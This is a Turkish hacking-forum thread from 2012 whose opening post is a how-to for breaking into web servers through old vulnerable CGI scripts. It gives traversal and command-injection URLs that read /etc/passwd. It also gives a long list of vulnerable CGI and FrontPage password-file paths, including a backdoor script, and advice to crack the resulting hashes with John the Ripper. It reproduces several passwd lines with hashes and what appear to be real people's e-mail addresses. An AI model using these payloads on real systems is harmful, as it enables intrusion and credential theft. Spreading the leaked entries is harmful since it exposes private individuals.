İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

cgi hack...!!!

06-07-2012 18:52
#1
Hacker Yilmaz - ait Kullanıcı Resmi (Avatar)
E-Mail onayı yapılmamış üye
Üyelik tarihi:
07/2012
Nereden:
Bruksel
Mesajlar:
1.039
Teşekkür (Etti):
6
Teşekkür (Aldı):
70
Konular:
229
Ticaret:
(0) %
aciklarini bilmemesi potansiyel sistem aciklarina yol acmaktadir. Tum

dunyada pek cok hacker'in kullandiği cgi-bin guvenlik aciği:

http://www.kiracağimizadres.com.tr/c...%20/etc/passwd

Fakat bazi uyanik sistem yöneticileri phf komutunun kullanimini

sinirlamislardir. Bu yuzden bu komutu calistiramayabilirsiniz. Fakat yine

de alternatif web makinalari uzerinde denemekte yarar var.

b- (Wrap Scripti): Irix isletim sisteminin 6.2 versiyonunda rastlanan bu

hatayi da söyle istismar edebiliriz:

http://www.kiracağimizadres.com.tr/c.../../etc/passwd

http://www.kiracağimizadres.com.tr/cgi-bin/wrap?%0als (...)

Dikkat edeceğimiz tek nokta bu hata sadece IRIX 6.2'de var. !!

c- (View Source Scripti): Denemek serbest (basariya ulasabilme

ihtimali kadar ulasamama ihtimali de var)

http://www.kiracağimizadres.com.tr/c.../../etc/passwd

ya da

http://www.kiracaimizadres.com.tr/cg...iew-source?%1b or

%0a %20

d- (php.cgi Scripti):

http://www.victim.com/cgi-bin/php.cg.../../etc/passwd

e- Diğer Denenebilir Scriptler:

http://www.kiracagimizadres.com.tr/c...0-c%201000%20- or

%205000%20ip%20to%20shoot

http://www.kiracagimizadres.com.tr/c...cp%20phf%20fhp

http://www.kiracagimizadres.com.tr/c...%20phf%20.blah

http://www.kiracagimizadres.com.tr/c...l%20/dir/to/go

http://www.kiracagimizadres.com.tr/c...ww/dirtocreate

http://www.kiracagimizadres.com.tr/c...ogs/access_log


aglimpse > /cgi-bin/aglimpse
AnyForm2 > /cgi-bin/AnyForm2
args.bat > /cgi-dos/args.bat
AT-admin > /cgi-bin/AT-admin.cgi
bnbform.cgi > /cgi-bin/bnbform.cgi
campas > /cgi-bin/campas
carbo.dll > /carbo.dll
CGImail.exe > /scripts/CGImail.exe
cgiwrap > /cgi-bin/cgiwrap
classifieds.cgi > /cgi-bin/classifieds.cgi
Count.cgi > /cgi-bin/Count.cgi
displayopenedfile.cfm > /cfdocs/expelval/displayopenedfile.cfm
docs/codebrws.asp > /iissamples/sdk/asp/docs/codebrws.asp
edit.pl > /cgi-bin/edit.pl
environ.cgi > /cgi-bin/environ.cgi
exprcalc.cfm > /cfdocs/expelval/exprcalc.cfm
Fax Survey > /cgi-bin/faxsurvey
filemail.pl > /cgi-bin/filemail.pl
files.pl > /cgi-bin/files.pl
Finger > /cgi-bin/finger
fpcount.exe > /scripts/fpcount.exe
glimpse > /cgi-bin/glimpse
guestbook.cgi > /cgi-bin/guestbook.cgi
Handler > /cgi-bin/handler
howitworks/codebrws.asp > /iissamples/exair/howitworks/codebrws.asp
HTML Script > /cgi-bin/htmlscript
HTIMAGE > cgi-bin/htimage.exe
info2www > /cgi-bin/info2www
issadmin/bir.htr > /scripts/issadmin/bdir.htr
jj > /cgi-bin/jj
maillist.pl > /cgi-bin/maillist.pl
man.sh > /cgi-bin/man.sh
newdsn.exe > /scripts/tools/newdsn.exe
nph-publish > /cgi-bin/nph-publish
nph-test-cgi > /cgi-bin/nph-test-cgi
openfile.cfm > /cfdocs/expelval/openfile.cfm
perl.exe > /cgi-bin/perl.exe
perlshop.cgi > /cgi-bin/perlshop.cgi
PF Display > /cgi-bin/pfdispaly.cgi
PHF > /cgi-bin/phf
PHP > /cgi-bin/php.cgi
rguest.exe > /cgi-bin/rguest.exe
search97.vts > /search97.vts
sendmail.cfm > /cfdocs/expelval/sendmail.cfm
showcode.asp > /msads/Samples/SELECTOR/showcode.asp
survey.cgi > /cgi-bin/survey.cgi
Test-CGI > /cgi-bin/test-cgi
textcounter.pl > /cgi-bin/textcounter.pl
THC - Backdoor > /cgi-bin/rwwwsh*ll.pl
uploader.exe > /cgi-win/uploader.exe
view-source > /cgi-bin/view-source
view-source > /cgi-bin/view-source
VTI BIN [shtml.dll] > /_vti_bin/shtml.dll
VTI BIN [shtml.exe] > /_vti_bin/shtml.exe
VTI INF [_vti_inf.html] > /_vti_inf.html
VTI PVT [administrators.pwd] > /_vti_pvt/administrators.pwd
VTI PVT [authors.pwd] > /_vti_pvt/authors.pwd
VTI PVT [service.pwd] > /_vti_pvt/service.pwd
VTI PVT [users.pwd] > /_vti_pvt/users.pwd
Web Sendmail > /cgi-bin/websendmail
webdist.cgi > /cgi-bin/webdist.cgi
WebGais > /cgi-bin/webgais
wguest.exe > /cgi-bin/wguest.exe
wrap > /cgi-bin/wrap
www-sql > /cgi-bin/www-sql
wwwboard.pl > /cgi-bin/wwwboard.pl


Bunları nasıl kullanacaınızı biliyorsunuz !

2. Yol :
Manuel olarak aramak yerine işimizi kolaylaştırmak için bir CGI Scanner kullanabiliriz. Not: CGI'ları aradığınız sitede bulursanız bunu çalıştıran exploit'i de bulmanız gerekir. Şimdi diyelim ki *** yoldan birini kullanarak PHF açığını bulduk. Bunu şöyle kullanırız: http://www.domain.com/cgi-bin/phf?Q...t%20/etc/passwd yazarız. Tabi çıkan dosya etc içindeki username ve password'lerin olduğu password dosyası olacaktır. Şu şekilde:

slasher:VTNaA6DjT/9ME:1603:100:,robertmaier@gmx.net,,:/home/ slasher:/bin/bashpar
mcgreen:ryKOFkUDiGO3A:1604:100:,mail@reinhard-gruene.de,,:/h ome/mcgreen:/bin/bashpar
abi98:cUp.uUzNzr8YY:1605:100:,baileyberni@gmx.de,, :/home/abi98:/bin/bashpar
henner_:ziprJNh85rk.o:1606:100:,henner_@web.de,,:/home/henne r_:/bin/bashpar

Çıkan password'ları bir password cracker ile kırabilirsiniz (John The Ripper tavsiye edilir.) Manuel olarak veya bir program yardımıyla hack etmek istediğimiz sayfada service.pwd varsa ne yapacağız? http://www.domain.com/_vti_pvt/services.pwd
yazarız. İşte bir de PHP CGI örneği: http://www.domain.com/cgi-bin/php.c..../../etc/passwd Bu örneklere bakarak olayın mantığını biraz da olsa kavrayabilirsiniz. Bug'ı bulduktan sonra exploit'ini bulup veya yazıp çalıştırmanız gerek

07-07-2012 16:54
#2
yerdavader - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2012
Mesajlar:
9
Teşekkür (Etti):
1
Teşekkür (Aldı):
0
Konular:
1
Ticaret:
(0) %
neden domain comu ornek vermissin ben anlayamadım
07-07-2012 19:46
#3
Hacker Yilmaz - ait Kullanıcı Resmi (Avatar)
E-Mail onayı yapılmamış üye
Üyelik tarihi:
07/2012
Nereden:
Bruksel
Mesajlar:
1.039
Teşekkür (Etti):
6
Teşekkür (Aldı):
70
Konular:
229
Ticaret:
(0) %
ben onu bir misal olarak koydum

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı